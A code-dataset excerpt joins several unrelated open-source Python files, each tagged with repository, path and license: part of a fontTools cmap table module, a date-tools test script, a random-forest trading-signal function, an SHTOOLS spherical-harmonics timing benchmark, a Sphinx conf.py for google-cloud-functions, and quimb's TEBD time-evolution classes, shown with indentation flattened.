self.language = 0xFF # provide a value so that CmapSubtable.__lt__() won't fail
if not hasattr(self, "cmap"):
self.cmap = {} # so that clients that expect this to exist in a cmap table won't fail.
if not hasattr(self, "uvsDict"):
self.uvsDict = {}
uvsDict = self.uvsDict
for element in content:
if not isinstance(element, tuple):
continue
name, attrs, content = element
if name != "map":
continue
uvs = safeEval(attrs["uvs"])
uv = safeEval(attrs["uv"])
gname = attrs["name"]
if gname == "None":
gname = None
try:
uvsDict[uvs].append( [uv, gname])
except KeyError:
uvsDict[uvs] = [ [uv, gname] ]
def compile(self, ttFont):
if self.data:
return struct.pack(">HLL", self.format, self.length , self.numVarSelectorRecords) + self.data
uvsDict = self.uvsDict
uvsList = sorted(uvsDict.keys())
self.numVarSelectorRecords = len(uvsList)
offset = 10 + self.numVarSelectorRecords*11 # current value is end of VarSelectorRecords block.
data = []
varSelectorRecords =[]
for uvs in uvsList:
entryList = uvsDict[uvs]
defList = [entry for entry in entryList if entry[1] is None]
if defList:
defList = [entry[0] for entry in defList]
defOVSOffset = offset
defList.sort()
lastUV = defList[0]
cnt = -1
defRecs = []
for defEntry in defList:
cnt +=1
if (lastUV+cnt) != defEntry:
rec = struct.pack(">3sB", cvtFromUVS(lastUV), cnt-1)
lastUV = defEntry
defRecs.append(rec)
cnt = 0
rec = struct.pack(">3sB", cvtFromUVS(lastUV), cnt)
defRecs.append(rec)
numDefRecs = len(defRecs)
data.append(struct.pack(">L", numDefRecs))
data.extend(defRecs)
offset += 4 + numDefRecs*4
else:
defOVSOffset = 0
ndefList = [entry for entry in entryList if entry[1] is not None]
if ndefList:
nonDefUVSOffset = offset
ndefList.sort()
numNonDefRecs = len(ndefList)
data.append(struct.pack(">L", numNonDefRecs))
offset += 4 + numNonDefRecs*5
for uv, gname in ndefList:
gid = ttFont.getGlyphID(gname)
ndrec = struct.pack(">3sH", cvtFromUVS(uv), gid)
data.append(ndrec)
else:
nonDefUVSOffset = 0
vrec = struct.pack(">3sLL", cvtFromUVS(uvs), defOVSOffset, nonDefUVSOffset)
varSelectorRecords.append(vrec)
data = bytesjoin(varSelectorRecords) + bytesjoin(data)
self.length = 10 + len(data)
headerdata = struct.pack(">HLL", self.format, self.length , self.numVarSelectorRecords)
self.data = headerdata + data
return self.data
class cmap_format_unknown(CmapSubtable):
def toXML(self, writer, ttFont):
cmapName = self.__class__.__name__[:12] + str(self.format)
writer.begintag(cmapName, [
("platformID", self.platformID),
("platEncID", self.platEncID),
])
writer.newline()
writer.dumphex(self.data)
writer.endtag(cmapName)
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
self.data = readHex(content)
self.cmap = {}
def decompileHeader(self, data, ttFont):
self.language = 0 # dummy value
self.data = data
def decompile(self, data, ttFont):
# we usually get here indirectly from the subtable __getattr__ function, in which case both args must be None.
# If not, someone is calling the subtable decompile() directly, and must provide both args.
if data is not None and ttFont is not None:
self.decompileHeader(data[offset:offset+int(length)], ttFont)
else:
assert (data is None and ttFont is None), "Need both data and ttFont arguments"
def compile(self, ttFont):
if self.data:
return self.data
else:
return None
cmap_classes = {
0: cmap_format_0,
2: cmap_format_2,
4: cmap_format_4,
6: cmap_format_6,
12: cmap_format_12,
13: cmap_format_13,
14: cmap_format_14,
}
|
googlei18n/fontuley
|
src/third_party/fontTools/Lib/fontTools/ttLib/tables/_c_m_a_p.py
|
Python
|
apache-2.0
| 45,080 | 0.032276 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Datetools provide a method of manipulating and working dates and times.
# Copyright (C) 2013-2018 Chris Caron <lead2gold@gmail.com>
#
# This file is part of Datetools. Datetools is free software; you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
This is just a simple tool for testing that the output is as expected
"""
from datetime import datetime
from dateblock import dateblock
from datetime import date
from datetime import time
# Support python datetime object
print dateblock("*/1", ref=datetime(2000, 5, 3, 10, 10, 0))
# Support python date object
print dateblock("*/1", ref=date(2000, 5, 3))
# Support python time object
print dateblock("*/1", ref=time(20, 5, 3), block=False)
# Time equals 'now'
print dateblock("*/1", ref=None, block=False)
# Epoch Time
print dateblock("*/1", ref=7999434323, block=False)
# Drift Time
print dateblock("*/10 +5", ref=7999434323, block=False)
# Blocking should never be possible if the time is in the past
print dateblock("*/10 +7", ref=999434323, block=True)
# Drifting inline
print dateblock("*/10 +5", ref=date(2000, 1, 1), block=False)
# Drifting inline (with option specified, inline should over-ride)
# Drifting without use of +
print dateblock("*/10 * * * * * 5", ref=date(2000, 2, 1), block=False)
# Drifting with multiple options specified
print dateblock("* 10 +5,8", ref=date(2000, 3, 1), block=False)
|
caronc/datetools
|
src/pytest.py
|
Python
|
gpl-2.0
| 2,031 | 0 |
import pandas as pd
import numpy as np
from random import sample
from sklearn.ensemble import RandomForestClassifier
def ML_BuySell(all_data, predictDate, predictors, previous_results, limit=0.0051,
limit_comp=np.arange(-.015, 0.02, 0.001), days_previous=252, train_split=0.8, n=3,acc_limit=0.75):
"""
This function takes all the information about previous traddes and used a random forest model to predict
what is going to happen on the query date.
:param all_data: pandas DataFrame, All technical details. generated from Predictors class
:param predictDate: pandas DateTime, The timestamp you want to look at
:param predictors: array, containing the names of the technical indicators used.
:param previous_results: pandas DataFrame, containing the daily percentage change
:param limit: float, the minimum limit for which trades can occur
:param limit_comp: numpy array, a list of percentages to check
:param days_previous: int, How many previous days should be simulated
:param train_split: float, Training/Testing split between (0, 1)
:param n: int, number of random forrest classifiers
:param acc_limit: float, specifies the minimum accuracy for a trade to take place.
:return: pandas DataFrame containing Buy and Sell commands.
"""
# Split into testing and training data.
ALLX_DATA = all_data.ix[all_data.index < predictDate, predictors]
if len(ALLX_DATA) < days_previous:
return
ALLY_DATA = previous_results.ix[all_data.index <= predictDate].shift(-1)
ALLY_DATA = ALLY_DATA.drop(ALLY_DATA.index[-1])
fluc_m = []
X_TEST_B = ALLX_DATA[(-1 * days_previous):]
Y_TEST_B = ALLY_DATA[(-1 * days_previous):]
# Get parameters for the day in question
PREDICT_X = all_data.ix[all_data.index == predictDate, predictors]
if PREDICT_X.empty:
return
pred_v = []
acc = []
for x in np.nditer(limit_comp):
indices = sample(range(days_previous), int(np.round(days_previous * train_split)))
X_TRAIN = X_TEST_B.ix[indices]
Y_TRAIN = Y_TEST_B.ix[indices]
X_TEST = X_TEST_B.drop(X_TEST_B.index[indices])
Y_TEST = Y_TEST_B.drop(Y_TEST_B.index[indices])
# Fit the training data
fluc_m.append(RandomForestClassifier(n_estimators=n))
fluc_m[-1].fit(X_TRAIN, 1*(Y_TRAIN > x))
# See how well we did
a = fluc_m[-1].score(X_TEST, 1*(Y_TEST > x))
acc.append(a)
# Predict the future
pred_v.append(fluc_m[-1].predict(PREDICT_X)[0])
# Make an estimate of the daily change
change = 0
for i in range(1, len(limit_comp)):
l = (pred_v[i - 1] > pred_v[i])
if l:
change = change + (l* limit_comp[i])
# If it is more than what we want, precede.
if change > limit:
return pd.concat([
pd.DataFrame({"Price": all_data.ix[all_data.index == predictDate, "price"],
"Regime": 1,
"Signal": "Buy"}),
pd.DataFrame({"Price": all_data.ix[all_data.index == predictDate, "price"],
"Regime": -1,
"Signal": "Sell"})
])
else:
return None
|
simonward86/MySJcLqwwx
|
ML_predict.py
|
Python
|
apache-2.0
| 3,255 | 0.006759 |
#!/usr/bin/env python
"""
This script is a python version of TimingAccuracyDHC. We use numpy functions to
simplify the creation of random coefficients.
"""
import os
import sys
import time
import numpy as np
sys.path.append(os.path.join(os.path.dirname(__file__), "../../.."))
import pyshtools as shtools
#==== MAIN FUNCTION ====
def main():
TimingAccuracyDHC()
#==== TEST FUNCTIONS ====
def TimingAccuracyDHC():
#---- input parameters ----
maxdeg = 2800
ls = np.arange(maxdeg + 1)
sampling = 1
beta = -1.5
#---- create mask to filter out m<=l ----
mask = np.zeros(2 * (maxdeg + 1) * (maxdeg + 1), dtype=np.bool).reshape(2, maxdeg + 1, maxdeg + 1)
mask[0, 0, 0] = True
for l in ls:
mask[:, l, :l + 1] = True
mask[1, :, 0] = False
#---- create Gaussian powerlaw coefficients ----
print 'creating {:d} random coefficients'.format(2 * (maxdeg + 1) * (maxdeg + 1))
cilm = np.zeros((2, (maxdeg + 1), (maxdeg + 1)), dtype=np.complex)
random_numbers = np.random.normal(loc=0., scale=1., size=2 * (maxdeg + 1) * (maxdeg + 1))
cilm.imag = random_numbers.reshape(2, maxdeg + 1, maxdeg + 1)
random_numbers = np.random.normal(loc=0., scale=1., size=2 * (maxdeg + 1) * (maxdeg + 1))
cilm.real = random_numbers.reshape(2, maxdeg + 1, maxdeg + 1)
cilm[:, 1:, :] *= np.sqrt((ls[1:]**beta) / (2. * ls[1:] + 1.))[None, :, None]
#---- time spherical harmonics transform for lmax set to increasing powers of 2 ----
lmax = 2
print 'lmax maxerror rms tinverse tforward'
while lmax <= maxdeg:
# trim coefficients to lmax
cilm_trim = cilm[:, :lmax + 1, :lmax + 1]
mask_trim = mask[:, :lmax + 1, :lmax + 1]
#synthesis / inverse
tstart = time.time()
grid = shtools.MakeGridDHC(cilm_trim, sampling=sampling)
tend = time.time()
tinverse = tend - tstart
#analysis / forward
tstart = time.time()
cilm2_trim = shtools.SHExpandDHC(grid, sampling=sampling)
tend = time.time()
tforward = tend - tstart
# compute error
err = np.abs(cilm_trim[mask_trim] - cilm2_trim[mask_trim]) / np.abs(cilm_trim[mask_trim])
maxerr = err.max()
rmserr = np.mean(err**2)
print '{:4d} {:1.2e} {:1.2e} {:1.1e}s {:1.1e}s'.\
format(lmax, maxerr, rmserr, tinverse, tforward)
lmax = lmax * 2
#==== EXECUTE SCRIPT ====
if __name__ == "__main__":
main()
|
ian-r-rose/SHTOOLS
|
examples/python/TimingAccuracy/TimingAccuracyDHC.py
|
Python
|
bsd-3-clause
| 2,509 | 0.007573 |
# -*- coding: utf-8 -*-
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# google-cloud-functions documentation build configuration file
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(".."))
# For plugins that can not read conf.py.
# See also: https://github.com/docascode/sphinx-docfx-yaml/issues/85
sys.path.insert(0, os.path.abspath("."))
__version__ = ""
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = "1.5.5"
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.intersphinx",
"sphinx.ext.coverage",
"sphinx.ext.doctest",
"sphinx.ext.napoleon",
"sphinx.ext.todo",
"sphinx.ext.viewcode",
"recommonmark",
]
# autodoc/autosummary flags
autoclass_content = "both"
autodoc_default_options = {"members": True}
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = [".rst", ".md"]
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The root toctree document.
root_doc = "index"
# General information about the project.
project = "google-cloud-functions"
copyright = "2019, Google"
author = "Google APIs"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
release = __version__
# The short X.Y version.
version = ".".join(release.split(".")[0:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
"_build",
"**/.nox/**/*",
"samples/AUTHORING_GUIDE.md",
"samples/CONTRIBUTING.md",
"samples/snippets/README.rst",
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "alabaster"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
"description": "Google Cloud Client Libraries for google-cloud-functions",
"github_user": "googleapis",
"github_repo": "python-functions",
"github_banner": True,
"font_family": "'Roboto', Georgia, sans",
"head_font_family": "'Roboto', Georgia, serif",
"code_font_family": "'Roboto Mono', 'Consolas', monospace",
}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = "google-cloud-functions-doc"
# -- Options for warnings ------------------------------------------------------
suppress_warnings = [
# Temporarily suppress this to avoid "more than one target found for
# cross-reference" warning, which are intractable for us to avoid while in
# a mono-repo.
# See https://github.com/sphinx-doc/sphinx/blob
# /2a65ffeef5c107c19084fabdd706cdff3f52d93c/sphinx/domains/python.py#L843
"ref.python"
]
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
root_doc,
"google-cloud-functions.tex",
"google-cloud-functions Documentation",
author,
"manual",
)
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(
root_doc,
"google-cloud-functions",
"google-cloud-functions Documentation",
[author],
1,
)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
root_doc,
"google-cloud-functions",
"google-cloud-functions Documentation",
author,
"google-cloud-functions",
"google-cloud-functions Library",
"APIs",
)
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
"python": ("https://python.readthedocs.org/en/latest/", None),
"google-auth": ("https://googleapis.dev/python/google-auth/latest/", None),
"google.api_core": ("https://googleapis.dev/python/google-api-core/latest/", None,),
"grpc": ("https://grpc.github.io/grpc/python/", None),
"proto-plus": ("https://proto-plus-python.readthedocs.io/en/latest/", None),
"protobuf": ("https://googleapis.dev/python/protobuf/latest/", None),
}
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
|
googleapis/python-functions
|
docs/conf.py
|
Python
|
apache-2.0
| 12,404 | 0.000564 |
import numpy as np
import quimb as qu
class NNI:
"""An simple interacting hamiltonian object used, for instance, in TEBD.
Once instantiated, the ``NNI`` hamiltonian can be called like ``H_nni()``
to get the default two-site term, or ``H_nni((i, j))`` to get the term
specific to sites ``i`` and ``j``.
If the terms supplied are anything but a single, two-site term, then the
length of hamiltonian ``n`` must be specified too as the gates will no
longer be completely translationally invariant.
Parameters
----------
H2 : array_like or dict[tuple[int], array_like]
The sum of interaction terms. If a dict is given, the keys should be
nearest neighbours like ``(10, 11)``, apart from any default term which
should have the key ``None``, and the values should be the sum of
interaction terms for that interaction.
H1 : array_like or dict[int, array_like], optional
The sum of single site terms. If a dict is given, the keys should be
integer sites, apart from any default term which should have the key
``None``, and the values should be the sum of single site terms for
that site.
n : int, optional
The size of the hamiltonian.
cyclic : bool, optional
Whether the hamiltonian has periodic boundary conditions or not.
Attributes
----------
special_sites : set[(int, int)]
This keeps track of which pairs of sites don't just have the default
term
Examples
--------
A simple, translationally invariant, interaction-only ``NNI``::
>>> XX = pauli('X') & pauli('X')
>>> YY = pauli('Y') & pauli('Y')
>>> H_nni = NNI(XX + YY)
The same, but with a translationally invariant field as well (need to set
``n`` since the last gate will be different)::
>>> Z = pauli('Z')
>>> H_nni = NNI(H2=XX + YY, H1=Z, n=100)
Specifying a default interaction and field, with custom values set for some
sites::
>>> H2 = {None: XX + YY, (49, 50): (XX + YY) / 2}
>>> H1 = {None: Z, 49: 2 * Z, 50: 2 * Z}
>>> H_nni = NNI(H2=H2, H1=H1, n=100)
Specifying the hamiltonian entirely through site specific interactions and
fields::
>>> H2 = {(i, i + 1): XX + YY for i in range(99)}
>>> H1 = {i: Z for i in range(100)}
>>> H_nni = NNI(H2=H2, H1=H1, n=100)
See Also
--------
SpinHam
"""
def __init__(self, H2, H1=None, n=None, cyclic=False):
self.n = n
self.cyclic = cyclic
if isinstance(H2, np.ndarray):
H2 = {None: H2}
if isinstance(H1, np.ndarray):
H1 = {None: H1}
self.H2s = dict(H2)
self.H2s.setdefault(None, None)
if H1 is not None:
self.H1s = dict(H1)
else:
self.H1s = {}
self.H1s.setdefault(None, None)
# sites where the term might be different
self.special_sites = {ij for ij in self.H2s if ij is not None}
self.special_sites |= {(i, i + 1) for i in self.H1s if i is not None}
obc_with_field = (not self.cyclic) and (self.H1s[None] is not None)
# make sure n is supplied if it is needed
if n is None:
if (self.special_sites or obc_with_field):
raise ValueError("Need to specify ``n`` if this ``NNI`` is "
"anything but completely translationally "
"invariant (including OBC w/ field).")
# manually add the last interaction as a special site for OBC w/ field
# since the last gate has to apply single site field to both sites
elif not self.cyclic:
if obc_with_field or (self.n - 1 in self.H1s):
self.special_sites.add((self.n - 2, self.n - 1))
# this is the cache for holding generated two-body terms
self._terms = {}
def gen_term(self, sites=None):
"""Generate the interaction term acting on ``sites``.
"""
# make sure have sites as (i, i + 1) if supplied
if sites is not None:
i, j = sites = tuple(sorted(sites))
if j - i != 1:
raise ValueError("Only nearest neighbour interactions are "
"supported for an ``NNI``.")
else:
i = j = None
term = self.H2s.get(sites, self.H2s[None])
if term is None:
raise ValueError(f"No term has been set for sites {sites}, either "
"specifically or via a default term.")
# add single site term to left site if present
H1 = self.H1s.get(i, self.H1s[None])
# but only if this site has a term set
if H1 is not None:
I_2 = qu.eye(H1.shape[0], dtype=H1.dtype)
term = term + qu.kron(H1, I_2)
# if not PBC, for the last interaction, add to right site as well
if sites and (j == self.n - 1) and (not self.cyclic):
H1 = self.H1s.get(j, self.H1s[None])
# but again, only if that site has a term set
if H1 is not None:
I_2 = qu.eye(H1.shape[0], dtype=H1.dtype)
term = term + qu.kron(I_2, H1)
return term
def __call__(self, sites=None):
"""Get the cached term for sites ``sites``, generate if necessary.
"""
try:
return self._terms[sites]
except KeyError:
term = self.gen_term(sites)
self._terms[sites] = term
return term
def mean_norm(self, ntype='fro'):
"""Computes the average frobenius norm of local terms. Also generates
all terms if not already cached.
"""
if self.n is None:
return qu.norm(self(), ntype)
nterms = self.n - int(not self.cyclic)
return sum(
qu.norm(self((i, i + 1)), ntype)
for i in range(nterms)
) / nterms
def __repr__(self):
return f"<NNI(n={self.n}, cyclic={self.cyclic})>"
class TEBD:
"""Class implementing Time Evolving Block Decimation (TEBD) [1].
[1] Guifré Vidal, Efficient Classical Simulation of Slightly Entangled
Quantum Computations, PRL 91, 147902 (2003)
Parameters
----------
p0 : MatrixProductState
Initial state.
H : NNI or array_like
Dense hamiltonian representing the two body interaction. Should have
shape ``(d * d, d * d)``, where ``d`` is the physical dimension of
``p0``.
dt : float, optional
Default time step, cannot be set as well as ``tol``.
tol : float, optional
Default target error for each evolution, cannot be set as well as
``dt``, which will instead be calculated from the trotter orderm length
of time, and hamiltonian norm.
t0 : float, optional
Initial time. Defaults to 0.0.
split_opts : dict, optional
Compression options applied for splitting after gate application, see
:func:`~quimb.tensor.tensor_core.tensor_split`.
See Also
--------
quimb.Evolution
"""
def __init__(self, p0, H, dt=None, tol=None, t0=0.0,
split_opts=None, progbar=True):
# prepare initial state
self._pt = p0.copy()
self._pt.canonize(0)
self.N = self._pt.nsites
# handle hamiltonian -> convert array to NNI
if isinstance(H, np.ndarray):
H = NNI(H, cyclic=p0.cyclic)
if not isinstance(H, NNI):
raise TypeError("``H`` should be a ``NNI`` or 2-site array, "
"not a TensorNetwork of any form.")
if p0.cyclic != H.cyclic:
raise ValueError("Both ``p0`` and ``H`` should have matching OBC "
"or PBC.")
self.H = H
self.cyclic = H.cyclic
self._ham_norm = H.mean_norm()
self._U_ints = {}
self._err = 0.0
# set time and tolerance defaults
self.t0 = self.t = t0
if dt and tol:
raise ValueError("Can't set default for both ``dt`` and ``tol``.")
self.dt = self._dt = dt
self.tol = tol
# misc other options
self.progbar = progbar
self.split_opts = {} if split_opts is None else dict(split_opts)
@property
def pt(self):
"""The MPS state of the system at the current time.
"""
return self._pt.copy()
@property
def err(self):
return self._err
def choose_time_step(self, tol, T, order):
"""Trotter error is ``~ (T / dt) * dt^(order + 1)``. Invert to
find desired time step, and scale by norm of interaction term.
"""
return (tol / (T * self._ham_norm)) ** (1 / order)
def get_gate(self, dt_frac, sites=None):
"""Get the unitary (exponentiated) gate for fraction of timestep
``dt_frac`` and sites ``sites``, cached.
"""
if sites not in self.H.special_sites:
sites = None
try:
return self._U_ints[dt_frac, sites]
except KeyError:
U = qu.expm(-1.0j * self._dt * dt_frac * self.H(sites))
self._U_ints[dt_frac, sites] = U
return U
def sweep(self, direction, dt_frac, dt=None, queue=False):
"""Perform a single sweep of gates and compression. This shifts the
orthonognality centre along with the gates as they are applied and
split.
Parameters
----------
direction : {'right', 'left'}
Which direction to sweep. Right is even bonds, left is odd.
dt_frac : float
What fraction of dt substep to take.
dt : float, optional
Overide the current ``dt`` with a custom value.
"""
# if custom dt set, scale the dt fraction
if dt is not None:
dt_frac *= (dt / self._dt)
# ------ automatically combine consecutive sweeps of same time ------ #
if not hasattr(self, '_queued_sweep'):
self._queued_sweep = None
if queue:
# check for queued sweep
if self._queued_sweep:
# if matches, combine and continue
if direction == self._queued_sweep[0]:
self._queued_sweep[1] += dt_frac
return
# else perform the old, queue the new
else:
new_queued_sweep = [direction, dt_frac]
direction, dt_frac = self._queued_sweep
self._queued_sweep = new_queued_sweep
# just queue the new sweep
else:
self._queued_sweep = [direction, dt_frac]
return
# check if need to drain the queue first
elif self._queued_sweep:
queued_direction, queued_dt_frac = self._queued_sweep
self._queued_sweep = None
self.sweep(queued_direction, queued_dt_frac, queue=False)
# ------------------------------------------------------------------- #
if direction == 'right':
# Apply even gates:
#
# o-<-<-<-<-<-<-<-<-<- -<-<
# | | | | | | | | | | | | >~>~>~>~>~>~>~>~>~>~>~o
# UUU UUU UUU UUU UUU ... UUU --> | | | | | | | | | | | |
# | | | | | | | | | | | |
# 1 2 3 4 5 ==>
#
for i in range(0, self.N - 1, 2):
sites = (i, i + 1)
U = self.get_gate(dt_frac, sites)
self._pt.left_canonize(start=max(0, i - 1), stop=i)
self._pt.gate_split_(
U, where=sites, absorb='right', **self.split_opts)
elif direction == 'left':
# Apply odd gates:
#
# >->->- ->->->->->->->->-o
# | | | | | | | | | | | | o~<~<~<~<~<~<~<~<~<~<~<
# | UUU ... UUU UUU UUU UUU | --> | | | | | | | | | | | |
# | | | | | | | | | | | |
# <== 4 3 2 1
#
for i in reversed(range(1, self.N - (0 if self.cyclic else 1), 2)):
sites = (i, i + 1)
U = self.get_gate(dt_frac, sites)
self._pt.right_canonize(
start=min(self.N - 1, i + 2), stop=i + 1)
self._pt.gate_split_(
U, where=sites, absorb='left', **self.split_opts)
# one extra canonicalization not included in last split
self._pt.right_canonize_site(1)
def _step_order2(self, tau=1, **sweep_opts):
"""Perform a single, second order step.
"""
self.sweep('right', tau / 2, **sweep_opts)
self.sweep('left', tau, **sweep_opts)
self.sweep('right', tau / 2, **sweep_opts)
def _step_order4(self, **sweep_opts):
"""Perform a single, fourth order step.
"""
tau1 = tau2 = 1 / (4 * 4**(1 / 3))
tau3 = 1 - 2 * tau1 - 2 * tau2
self._step_order2(tau1, **sweep_opts)
self._step_order2(tau2, **sweep_opts)
self._step_order2(tau3, **sweep_opts)
self._step_order2(tau2, **sweep_opts)
self._step_order2(tau1, **sweep_opts)
def step(self, order=2, dt=None, progbar=None, **sweep_opts):
"""Perform a single step of time ``self.dt``.
"""
{2: self._step_order2,
4: self._step_order4}[order](dt=dt, **sweep_opts)
dt = self._dt if dt is None else dt
self.t += dt
self._err += self._ham_norm * dt ** (order + 1)
if progbar is not None:
progbar.cupdate(self.t)
self._set_progbar_desc(progbar)
def _compute_sweep_dt_tol(self, T, dt, tol, order):
# Work out timestep, possibly from target tol, and checking defaults
dt = self.dt if (dt is None) else dt
tol = self.tol if (tol is None) else tol
if not (dt or tol):
raise ValueError("Must set one of ``dt`` and ``tol``.")
if (dt and tol):
raise ValueError("Can't set both ``dt`` and ``tol``.")
if dt is None:
self._dt = self.choose_time_step(tol, T - self.t, order)
else:
self._dt = dt
return self._dt
TARGET_TOL = 1e-13 # tolerance to have 'reached' target time
def update_to(self, T, dt=None, tol=None, order=4, progbar=None):
"""Update the state to time ``T``.
Parameters
----------
T : float
The time to evolve to.
dt : float, optional
Time step to use. Can't be set as well as ``tol``.
tol : float, optional
Tolerance for whole evolution. Can't be set as well as ``dt``.
order : int, optional
Trotter order to use.
progbar : bool, optional
Manually turn the progress bar off.
"""
if T < self.t - self.TARGET_TOL:
raise NotImplementedError
